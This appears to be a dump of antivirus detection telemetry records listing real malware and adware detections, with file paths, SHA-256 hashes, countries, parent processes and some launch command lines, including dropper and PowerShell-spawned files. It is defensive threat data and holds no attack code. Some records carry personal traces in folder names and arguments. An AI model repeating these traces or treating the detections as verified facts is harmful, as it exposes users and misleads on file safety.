  Row(detection=Row(filename='avscan-20181102-221517-5d5f4d12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221517-5D5F4D12', filesize=64000, name='TR/Agent.64000.118.#M1.#R1'), hash='881c0e605130cfd9eca8ca14e5402a53a6b365a579221d829f5d80cd7447bb51', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ntbootautofix.exe', filepath='H:\\HBCD\\Programs\\NTBOOTAUTOFIX.EXE', filesize=64000, name='TR/Agent.64000.118.#M1.#R1'), hash='881c0e605130cfd9eca8ca14e5402a53a6b365a579221d829f5d80cd7447bb51', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='freeyoutubetomp3converter.vtsafe.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\FreeYouTubeToMP3Converter.vtsafe.exe', filesize=34488000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='885a5e231bfa625466aea0661ba90b13ca00a3238d9107b2bbc68da2bdaeaf49', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:57:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='freeyoutubetomp3converter.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\FreeYouTubeToMP3Converter.exe', filesize=34488000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='885a5e231bfa625466aea0661ba90b13ca00a3238d9107b2bbc68da2bdaeaf49', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:53:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='779e703f-efaf-aa21-a137-07cae611333e.exe', filepath='F:\\{68966de9-3ccd-0863-3cbc-c5dfc62c373f}\\779e703f-efaf-aa21-a137-07cae611333e.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='88723e07f10da4f273d86dd702476abc8e39e8a8f7e2ca936827af81e112701c', metadata=Row(cmdline='\\\\\\/c \\\\\\"{68966de9-3ccd-0863-3cbc-c5dfc62c373f}\\\\\\\\779e703f-efaf-aa21-a137-07cae611333e.exe \'dld.cg0tam0roianil@mmda\\\\\\\\\'\\\\\\"', country='MN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\cmd.exe', parentsize=232960, timestamp='2018-11-02T08:56:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-165713-2e690110', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2914d8c8\\AVSCAN-20181102-165637-29E55BE6\\AVSCAN-20181102-165713-2E690110', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='88723e07f10da4f273d86dd702476abc8e39e8a8f7e2ca936827af81e112701c', metadata=Row(cmdline=None, country='MN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:57:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lucumeca.exe', filepath='C:\\Users\\Associate Dean Udgir\\AppData\\Roaming\\Lucumeca.exe', filesize=704000, name='Adware/DealPly.8899a4.#M1.#R1'), hash='8899a4e35c54bbb2e9e497cee939b492ac00d3eae8f38a774707e169e15baf6a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T01:07:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4play.exe', filepath='D:\\العاب حرب 6 اكتوبر\\4PLAY13\\4PLAY.EXE', filesize=192000, name='W32/Neshta.A.#M1.#R1'), hash='88da81f62f4ed2fe0be67a057e418823cc331b7e118911f6d9c46d953e7fd8d1', metadata=Row(cmdline='kreem150 38333335393934323738383339373931373532 58', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Game\\SoftnyxGame\\WolfTeamMN\\Wolfteam.bin', parentsize=7464104, timestamp='2018-11-02T17:47:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4play.exe', filepath='D:\\العاب حرب 6 اكتوبر\\4PLAY13\\4PLAY.EXE', filesize=192000, name='W32/Neshta.A.#M1.#R1'), hash='88da81f62f4ed2fe0be67a057e418823cc331b7e118911f6d9c46d953e7fd8d1', metadata=Row(cmdline='aa011477 38333634303338353136353333373631343838 58', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Game\\SoftnyxGame\\WolfTeamMN\\Wolfteam.bin', parentsize=7464104, timestamp='2018-11-02T19:26:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='deletejobprinter.exe', filepath='F:\\HBCD\\Programs\\DeleteJobPrinter.exe', filesize=64000, name='TR/Agent.64000.119.#M1.#R1'), hash='892d3d7968ba29bd8e521710a5d9a62748c78fd4436a11cbc94c1ec4fb096f02', metadata=Row(cmdline='x \\\\\\"D:\\\\\\\\JOB\\\\\\\\Keluarga Operasi Sistem\\\\\\\\Hiren + Rufus\\\\\\\\12.Hiren.s.Boot.CD.15.2.iso\\\\\\" -o\\\\\\"F:\\\\\\\\\\\\\\" -y -x![BOOT]*', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\nsh6360.tmp\\7zG.exe', parentsize=227840, timestamp='2018-11-02T08:10:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='deletejobprinter.exe', filepath='E:\\HBCD\\Programs\\DeleteJobPrinter.exe', filesize=64000, name='TR/Agent.64000.119.#M1.#R1'), hash='892d3d7968ba29bd8e521710a5d9a62748c78fd4436a11cbc94c1ec4fb096f02', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102048-a58f922a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-102048-A58F922A', filesize=64000, name='TR/Agent.64000.119.#M1.#R1'), hash='892d3d7968ba29bd8e521710a5d9a62748c78fd4436a11cbc94c1ec4fb096f02', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:20:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='deletejobprinter.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\DeleteJobPrinter.exe", filesize=64000, name='TR/Agent.64000.119.#M1.#R1'), hash='892d3d7968ba29bd8e521710a5d9a62748c78fd4436a11cbc94c1ec4fb096f02', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:16:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102048-a58f922a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-102048-A58F922A', filesize=64000, name='TR/Agent.64000.119.#M1.#R1'), hash='892d3d7968ba29bd8e521710a5d9a62748c78fd4436a11cbc94c1ec4fb096f02', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:20:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081234-268cff3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081049-1917AE4E\\AVSCAN-20181102-081234-268CFF3E', filesize=64000, name='TR/Agent.64000.119.#M1.#R1'), hash='892d3d7968ba29bd8e521710a5d9a62748c78fd4436a11cbc94c1ec4fb096f02', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:12:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081352-30803ade', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081049-1917AE4E\\AVSCAN-20181102-081352-30803ADE', filesize=64000, name='TR/Agent.64000.119.#M1.#R1'), hash='892d3d7968ba29bd8e521710a5d9a62748c78fd4436a11cbc94c1ec4fb096f02', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:13:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='update-smadav.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\Smadav\\Update-Smadav.exe', filesize=448000, name='TR/Crypt.XPACK.Gen.#M300.#R3829'), hash='893e1e4a775ce897fb9d5a31ab97e126cc4502da521ccc4dbbd2ecf57c894af1', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\Smadav-Updater.exe', parentsize=73728, timestamp='2018-11-02T07:00:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-043508-ba5db017', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-043508-BA5DB017', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='89b60fb73d586146af97f822463ec751e00eb4d4641f37d6a454afd39a2e80bd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:37:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tunjangan operator sekolah.rar.exe', filepath='E:\\Lapor bulan\\data\\Arabic Pad 1.4\\BUKU AGAMA\\KLS 1\\cc\\Downloads\\TUNJANGAN OPERATOR SEKOLAH.rar.exe', filesize=1216000, name='ADWARE/MultiPlug.Gen4.#M300.#R300014'), hash='8a1a56a8088c8df6aeb899262dacef9f297706291bfe148bf6f6bb2ebd99c47d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T14:51:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ipl 2018.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\rar$exa5908.33855\\crack\\ipl 2018.exe', filesize=192000, name='SPR/DllInject.8a2eba.#M1.#R1'), hash='8a2eba19c9861cdd247cbaa3021504d5314d76a8e89b2036a2866a10a40c0d96', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=2189768, timestamp='2018-11-02T03:45:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='computerdefaults.exe', filepath='C:\\Windows\\System32\\ComputerDefaults.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='8aee0c128123617110e6239c2ab6ca42e1b862c101be3f5944ff8f1dfe276d8b', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:43:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='computerdefaults.exe', filepath='C:\\Windows\\System32\\ComputerDefaults.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='8aee0c128123617110e6239c2ab6ca42e1b862c101be3f5944ff8f1dfe276d8b', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:54:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8b1882f1d739458565cf015d0dc28751bce40663366ef316d8abacbcd74939cc', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8B1882F1D739458565CF015D0DC28751BCE40663366EF316D8ABACBCD74939CC', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8b1882f1d739458565cf015d0dc28751bce40663366ef316d8abacbcd74939cc', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:18:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8b1882f1d739458565cf015d0dc28751bce40663366ef316d8abacbcd74939cc', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8B1882F1D739458565CF015D0DC28751BCE40663366EF316D8ABACBCD74939CC', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8b1882f1d739458565cf015d0dc28751bce40663366ef316d8abacbcd74939cc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:22:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8b1882f1d739458565cf015d0dc28751bce40663366ef316d8abacbcd74939cc', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8B1882F1D739458565CF015D0DC28751BCE40663366EF316D8ABACBCD74939CC', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8b1882f1d739458565cf015d0dc28751bce40663366ef316d8abacbcd74939cc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:59:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8b2dde69d03d7619fa9bab5de842250cb68a30a46dbc2bc92ec68a3743ca5219', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\8B2DDE69D03D7619FA9BAB5DE842250CB68A30A46DBC2BC92EC68A3743CA5219', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8b2dde69d03d7619fa9bab5de842250cb68a30a46dbc2bc92ec68a3743ca5219', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:20:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pmc01015.exe', filepath='C:\\NOVA PASTA\\PVECF21\\BKPROG\\PMC01015.exe', filesize=8192000, name='W32/Sality.AT.#M1.#R1'), hash='8b41cda8d6482a0e2aca27f0fb0b07af12ca04d6688365f245de7ca2da27aec4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:59:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~seefe8.tmp', filepath='\\\\?\\E:\\Users\\X\\AppData\\Local\\Temp\\~seEFE8.tmp', filesize=832000, name='HEUR/AGEN.1025634.#M1.#R1'), hash='8b5b05bb198a1858dc3268339fd7bfa8e38ac7cfbcbd5cbb267d748dfc951f8c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T00:17:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cj7i1ms1b.exe', filepath='\\\\?\\C:\\Program Files\\0U03TMM0BO\\CJ7I1MS1B.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='8b89a98a561958e87953f6daa4f96b58f73edee4630396363aa1ea09d732cf60', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:38:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0500515.exe', filepath='C:\\System Volume Information\\_restore{3CA38AA8-B9A6-4ED4-AE21-93E70EB4803E}\\RP1220\\A0500515.exe', filesize=1768000, name='TR/Patched.Gen.#M300.#R2947'), hash='8bbd5bcc59566245477e24d3760bc4ec864d49d1a62f471d5694424c8f6afa25', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0500515.exe', filepath='C:\\System Volume Information\\_restore{3CA38AA8-B9A6-4ED4-AE21-93E70EB4803E}\\RP1220\\A0500515.exe', filesize=1768000, name='TR/Patched.Gen.#M300.#R2947'), hash='8bbd5bcc59566245477e24d3760bc4ec864d49d1a62f471d5694424c8f6afa25', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:12:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='resmgr.exe', filepath='\\\\?\\C:\\Program Files\\VONE\\TopSecSV\\ResMgr.exe', filesize=1768000, name='TR/Patched.Gen.#M300.#R2947'), hash='8bbd5bcc59566245477e24d3760bc4ec864d49d1a62f471d5694424c8f6afa25', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:53:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='resmgr.exe', filepath='C:\\Program Files\\VONE\\TopSecSV\\ResMgr.exe', filesize=1768000, name='TR/Patched.Gen.#M300.#R2947'), hash='8bbd5bcc59566245477e24d3760bc4ec864d49d1a62f471d5694424c8f6afa25', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:+rpm7Kk+OUW7kEhe.1', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-02T00:31:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{8308B24D-24B1-4D07-868B-83DB87E48564}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='8bc02e467dd9d260328f23b822e47ad7cfcb39d072d1a477540732be0b689f2b', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:41:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8bd9dfa412f36b3d6b5824c60ed3a61d241db5d188f0daffcde567c7a7c28d79', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\8BD9DFA412F36B3D6B5824C60ED3A61D241DB5D188F0DAFFCDE567C7A7C28D79', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8bd9dfa412f36b3d6b5824c60ed3a61d241db5d188f0daffcde567c7a7c28d79', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:20:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8c7e7172e5e46f61fb49b974dbd06a2b4524356411cfc95531356d6f4bfb6d79', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\8C7E7172E5E46F61FB49B974DBD06A2B4524356411CFC95531356D6F4BFB6D79', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='8c7e7172e5e46f61fb49b974dbd06a2b4524356411cfc95531356d6f4bfb6d79', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:03:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ehendwdvgl.exe', filepath='c:\\users\\X\\appdata\\roaming\\ehendwdvgl.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T20:14:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153504-3816ea44', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2c558025\\AVSCAN-20181102-153453-3660B6C5\\AVSCAN-20181102-153504-3816EA44', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:35:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134739-78653671', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_39c9d05c\\AVSCAN-20181102-134725-75DDFF02\\AVSCAN-20181102-134739-78653671', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:47:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uh.exe', filepath='c:\\users\\X\\appdata\\roaming\\uh.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:47:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gcedgf.exe', filepath='c:\\users\\X\\appdata\\roaming\\gcedgf.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:47:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fmjhl.exe', filepath='c:\\users\\X\\appdata\\roaming\\fmjhl.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:47:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-124658-797c6b43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d518bbe1\\AVSCAN-20181102-124602-739898C6\\AVSCAN-20181102-124658-797C6B43', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:47:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xuj.exe', filepath='c:\\users\\X\\appdata\\roaming\\xuj.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:47:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hhn.exe', filepath='c:\\users\\X\\appdata\\roaming\\hhn.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T15:07:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154808-cfd8e1dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2e284725\\AVSCAN-20181102-154725-C9F21634\\AVSCAN-20181102-154808-CFD8E1DC', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:48:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143035-73a41db5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9228d2e\\AVSCAN-20181102-143014-7073373B\\AVSCAN-20181102-143035-73A41DB5', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:30:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152700-505d115d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_17893377\\AVSCAN-20181102-152648-4E0A0812\\AVSCAN-20181102-152700-505D115D', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:26:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-142548-f96a7a93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea537d61\\AVSCAN-20181102-142520-F4B57842\\AVSCAN-20181102-142548-F96A7A93', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:50Z'), dt=datetime.date(2018, 11, 2)),
